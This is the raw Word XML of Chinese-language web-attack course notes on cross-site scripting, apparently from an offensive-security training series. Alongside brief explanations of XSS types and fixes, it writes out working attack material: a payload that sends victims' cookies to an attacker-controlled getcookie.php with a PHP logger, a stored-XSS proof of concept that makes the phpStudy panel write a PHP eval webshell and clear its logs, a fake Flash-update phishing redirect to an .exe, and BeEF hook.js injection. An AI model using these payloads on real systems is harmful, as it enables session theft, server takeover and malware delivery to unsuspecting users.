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C98D" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7EC9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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>攻防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>跨站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>盗取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>数据包提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>网络钓鱼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;BEEF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项目&amp;XSS平台&amp;危害利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269CDD86" w14:textId="44460C93" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7EC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71EF972" wp14:editId="2BB47054">
            <wp:extent cx="5272405" cy="164338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131A" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7EC9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5748B9D7" w14:textId="35C4DC21" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7EC9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A547231" wp14:editId="19F3B71F">
            <wp:extent cx="5272405" cy="585089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4E71" w14:textId="3CE44414" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7EC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4AD8B3B" wp14:editId="2518A0F9">
            <wp:extent cx="5274310" cy="4082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F6A7" w14:textId="04192AA1" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7EC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0C33092" wp14:editId="0066D57F">
            <wp:extent cx="5274310" cy="3972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47F3" w14:textId="4E732F13" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7EC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B2B3E96" wp14:editId="376C3D29">
            <wp:extent cx="5274310" cy="3521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02AE" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7EC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649E9909" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7E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分类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利用点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3361E794" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7E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存储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&amp;DOM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型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFDF587" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7E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-SWF&amp;SVG&amp;PDF&amp;HTML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等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C110F0" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7E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-PostMessage&amp;LocalStorage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B3994F" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7E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库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浏览器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插件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突变</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D4888" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7E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-MXSS&amp;UXSS&amp;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框架版本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写法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A48BA2" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7E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手工代码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在线平台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&amp;Beef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工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578D9400" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7E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-XSS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跨站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-Cookie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盗取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数据提交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网络钓鱼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D73AF25" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7EC9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输入输出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漏洞原理：接受输入数据，输出显示数据后解析执行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基础类型：反射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非持续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，存储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持续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BASE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拓展类型：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jquery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pdfxss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flashxss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业务类型：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localStorage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postMessage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React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Electron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VUE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常用标签：</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1"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https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://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www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freebuf</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="999999"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>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com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articles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web</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="9A6E3A"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="990055"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>340080.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="000000"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>html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攻击利用：盲打，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盗取，凭据窃取，页面劫持，网络钓鱼，权限维持等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安全修复：字符过滤，实例化编码，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http_only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CSP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拦截等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测试流程：看输出想输入在哪里，更改输入代码看执行（标签，过滤决定）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分类测试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数据交互的地方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headers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反馈与浏览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富文本编辑器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各类标签插入和自定义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数据输出的地方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用户资料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数据输出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评论，留言等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关键词、标签、说明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攻击利用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凭据盗取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条件：无防护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凭据获取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利用：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平台或手写接受代码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演示：某贷款分配系统存储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手工：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'http://xx.xx.xx.xx/getcookie.php?u='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href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'&amp;c='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document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cookie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document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write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"&lt;img src="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 /&gt;"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接受：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&lt;?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$url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'u'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$cookie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$_GET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'c'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$fp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fopen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'cookie.txt'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"a"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fwrite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$fp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$url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"|"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$cookie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"\n"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fclose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$fp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平台：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XSSReceiver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简单配置即可使用，无需数据库，无需其他组件支持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epoch99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BlueLotus_XSSReceiver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master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攻击利用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条件：熟悉后台业务功能数据包，利用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写一个模拟提交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利用：凭据获取不到或有防护无法利用凭据进入时执行其他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演示：小皮面板系统存储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提交数据包模拟写入后门文件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blog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csdn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RestoreJustice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article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details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129735449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 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"http://xx.xxx.xxx/poc.js"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poc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$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get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'/service/app/tasks.php?type=task_list'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,{},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].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$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'/service/app/tasks.php?type=exec_task'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tid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},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$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'/service/app/log.php?type=clearlog'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},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){},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"json"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"json"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"json"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save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var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data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task_id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title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"test"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exec_cycle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week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day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"3"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hour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"14"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minute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"20"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'echo "&lt;?php @eval($_POST[123]);?&gt;" &gt;C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php'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$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post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'/service/app/tasks.php?type=save_shell'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function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poc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'json'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save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攻击利用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、部署可访问的钓鱼页面并修改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、植入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代码等待受害者触发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、将后门及正常文件捆绑打包免杀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：可在后续红队钓鱼篇章学习钓鱼页面制作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r00tSe7en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Fake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flash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cn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alert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当前浏览器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Flash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版本过低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请下载升级！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location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href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'http://x.x.x.x/flash.exe'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攻击利用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溯源综合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浏览器控制框架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beef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只需执行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文件，即可实现对当前浏览器的控制，可配合各类手法利用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演示：阿里云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Ubuntu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16.04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x64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按量计费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HK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香港服务器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apt update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apt install docker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apt install docker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compose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docker run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rm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p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3000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3000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janes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beef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panel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（账号密码：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beef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beef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利用：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 src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"http://ip:3000/hook.js"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&gt;&lt;/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script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</w:p>
    <w:p w14:paraId="0A1314E8" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7EC9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1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1915C281" w14:textId="77777777" w:rsidR="001D7EC9" w:rsidRDefault="001D7EC9" w:rsidP="001D7EC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6B8AE166" w14:textId="77777777" w:rsidR="00CD3F40" w:rsidRDefault="00CD3F40"/>
    <w:sectPr w:rsidR="00CD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026"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C284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E4"/>
    <w:rsid w:val="001D7EC9"/>
    <w:rsid w:val="00CD3F40"/>
    <w:rsid w:val="00F5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F627-8B19-4C4E-812D-022DFC39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1D7EC9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7E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7E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D7EC9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D7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reebuf.com/articles/web/34008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2025-03-20T10:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-20T10:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>